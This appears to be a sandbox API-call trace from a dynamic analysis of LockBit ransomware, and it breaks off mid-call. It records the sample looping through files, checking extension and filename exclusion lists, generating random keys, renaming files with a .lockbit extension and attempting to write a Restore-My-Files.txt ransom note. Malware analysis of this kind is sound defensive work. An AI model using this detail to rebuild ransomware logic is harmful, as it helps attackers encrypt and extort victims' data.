[0166.384] lstrcmpiW (lpString1="..", lpString2="PE00485_.WMF") returned -1 [0166.384] PathFindExtensionW (pszPath="PE00485_.WMF") returned=".WMF" [0166.384] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0166.384] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0166.384] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0166.384] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0166.384] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0166.385] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0166.385] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0166.385] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0166.385] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0166.385] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0166.385] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0166.385] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0166.385] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0166.385] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0166.385] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0166.385] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0166.385] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0166.385] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0166.385] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0166.385] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0166.385] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0166.385] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0166.385] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0166.385] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0166.385] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0166.385] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0166.385] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0166.386] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0166.386] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0166.386] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0166.386] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0166.386] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0166.386] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0166.386] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0166.386] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0166.386] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0166.386] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0166.386] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0166.386] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0166.386] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0166.386] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0166.386] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0166.386] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0166.386] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0166.386] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0166.386] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0166.386] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0166.386] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE00485_.WMF") returned 1 [0166.386] lstrcmpiW (lpString1="ntldr", lpString2="PE00485_.WMF") returned -1 [0166.387] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE00485_.WMF") returned -1 [0166.387] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE00485_.WMF") returned -1 [0166.387] lstrcmpiW (lpString1="autorun.inf", lpString2="PE00485_.WMF") returned -1 [0166.387] lstrcmpiW (lpString1="thumbs.db", lpString2="PE00485_.WMF") returned 1 [0166.387] lstrcmpiW (lpString1="iconcache.db", lpString2="PE00485_.WMF") returned -1 [0166.387] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0166.387] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00485_.WMF") returned=".WMF" [0166.387] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0166.387] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0166.387] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0166.387] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0166.387] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0166.387] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0166.387] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0166.387] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0166.387] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0166.387] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0166.387] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0166.387] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0166.387] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0166.387] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0166.388] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0166.388] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0166.388] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0166.388] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0166.388] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0166.388] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0166.388] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0166.388] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0166.388] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0166.388] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0166.388] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0166.388] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0166.388] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0166.388] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0166.388] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00485_.WMF.lockbit") returned 72 [0166.388] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00485_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00485_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0166.389] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0166.390] malloc (_Size=0x40068) returned 0x1ff1e60 [0166.390] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=16676) returned 1 [0166.390] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.390] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.390] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0166.390] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.391] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.391] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0166.391] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0166.395] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00485_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00485_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0166.396] malloc (_Size=0xa6) returned 0x1fa2ed8 [0166.397] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0166.397] free (_Block=0x1fa2ed8) [0166.397] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00485_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0166.397] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0166.397] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0166.397] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d627000, ftCreationTime.dwHighDateTime=0x1bd98a5, ftLastAccessTime.dwLowDateTime=0x6cd8b0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5d627000, ftLastWriteTime.dwHighDateTime=0x1bd98a5, nFileSizeHigh=0x0, nFileSizeLow=0x1402c, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE00489_.WMF", cAlternateFileName="")) returned 1 [0166.397] lstrcmpiW (lpString1=".", lpString2="PE00489_.WMF") returned -1 [0166.397] lstrcmpiW (lpString1="..", lpString2="PE00489_.WMF") returned -1 [0166.397] PathFindExtensionW (pszPath="PE00489_.WMF") returned=".WMF" [0166.397] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0166.397] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0166.397] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0166.397] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0166.397] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0166.398] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0166.398] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0166.398] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0166.398] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0166.398] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0166.398] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0166.398] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0166.398] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0166.398] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0166.398] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0166.398] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0166.398] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0166.398] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0166.398] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0166.398] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0166.398] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0166.398] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0166.398] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0166.398] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0166.398] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0166.398] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0166.398] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0166.398] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0166.398] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0166.398] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0166.399] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0166.399] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0166.399] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0166.399] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0166.399] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0166.399] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0166.399] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0166.399] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0166.399] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0166.399] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0166.399] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0166.399] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0166.399] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0166.399] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0166.399] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0166.399] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0166.399] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0166.399] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE00489_.WMF") returned 1 [0166.399] lstrcmpiW (lpString1="ntldr", lpString2="PE00489_.WMF") returned -1 [0166.399] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE00489_.WMF") returned -1 [0166.399] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE00489_.WMF") returned -1 [0166.399] lstrcmpiW (lpString1="autorun.inf", lpString2="PE00489_.WMF") returned -1 [0166.399] lstrcmpiW (lpString1="thumbs.db", lpString2="PE00489_.WMF") returned 1 [0166.399] lstrcmpiW (lpString1="iconcache.db", lpString2="PE00489_.WMF") returned -1 [0166.399] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0166.400] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00489_.WMF") returned=".WMF" [0166.400] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0166.400] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0166.400] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0166.400] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0166.400] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0166.400] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0166.400] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0166.400] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0166.400] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0166.400] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0166.400] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0166.400] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0166.400] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0166.400] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0166.400] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0166.400] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0166.400] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0166.400] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0166.400] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0166.400] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0166.400] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0166.400] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0166.400] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0166.400] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0166.401] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0166.401] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0166.401] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0166.401] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0166.401] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00489_.WMF.lockbit") returned 72 [0166.401] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00489_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00489_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0166.442] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0166.444] malloc (_Size=0x40068) returned 0x3df0008 [0166.444] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=81964) returned 1 [0166.444] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.445] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.445] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0166.445] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.445] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.445] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0166.445] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0166.447] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00489_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00489_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0166.447] malloc (_Size=0xa6) returned 0x1fa2ed8 [0166.447] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0166.449] free (_Block=0x1fa2ed8) [0166.449] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00489_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0166.449] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0166.449] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0166.449] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb32c0c00, ftCreationTime.dwHighDateTime=0x1bf323f, ftLastAccessTime.dwLowDateTime=0x59c8edf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb32c0c00, ftLastWriteTime.dwHighDateTime=0x1bf323f, nFileSizeHigh=0x0, nFileSizeLow=0x1ee4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE00531_.WMF", cAlternateFileName="")) returned 1 [0166.449] lstrcmpiW (lpString1=".", lpString2="PE00531_.WMF") returned -1 [0166.449] lstrcmpiW (lpString1="..", lpString2="PE00531_.WMF") returned -1 [0166.449] PathFindExtensionW (pszPath="PE00531_.WMF") returned=".WMF" [0166.449] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0166.449] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0166.449] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0166.449] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0166.449] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0166.450] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0166.450] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0166.450] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0166.450] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0166.450] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0166.450] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0166.450] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0166.450] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0166.450] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0166.450] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0166.450] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0166.450] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0166.450] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0166.450] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0166.450] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0166.450] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0166.450] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0166.450] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0166.450] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0166.450] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0166.450] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0166.451] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0166.451] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0166.451] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0166.451] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0166.451] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0166.451] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0166.451] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0166.451] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0166.451] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0166.451] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0166.451] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0166.451] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0166.451] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0166.451] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0166.451] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0166.451] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0166.451] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0166.451] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0166.452] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0166.452] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0166.452] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0166.452] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE00531_.WMF") returned 1 [0166.452] lstrcmpiW (lpString1="ntldr", lpString2="PE00531_.WMF") returned -1 [0166.452] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE00531_.WMF") returned -1 [0166.452] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE00531_.WMF") returned -1 [0166.452] lstrcmpiW (lpString1="autorun.inf", lpString2="PE00531_.WMF") returned -1 [0166.452] lstrcmpiW (lpString1="thumbs.db", lpString2="PE00531_.WMF") returned 1 [0166.452] lstrcmpiW (lpString1="iconcache.db", lpString2="PE00531_.WMF") returned -1 [0166.452] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0166.452] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00531_.WMF") returned=".WMF" [0166.452] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0166.452] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0166.452] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0166.453] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0166.453] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0166.453] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0166.453] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0166.453] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0166.453] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0166.453] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0166.453] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0166.453] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0166.453] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0166.453] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0166.453] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0166.453] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0166.453] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0166.453] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0166.453] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0166.454] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0166.454] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0166.454] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0166.454] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0166.454] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0166.454] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0166.454] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0166.454] lstrcmpiW 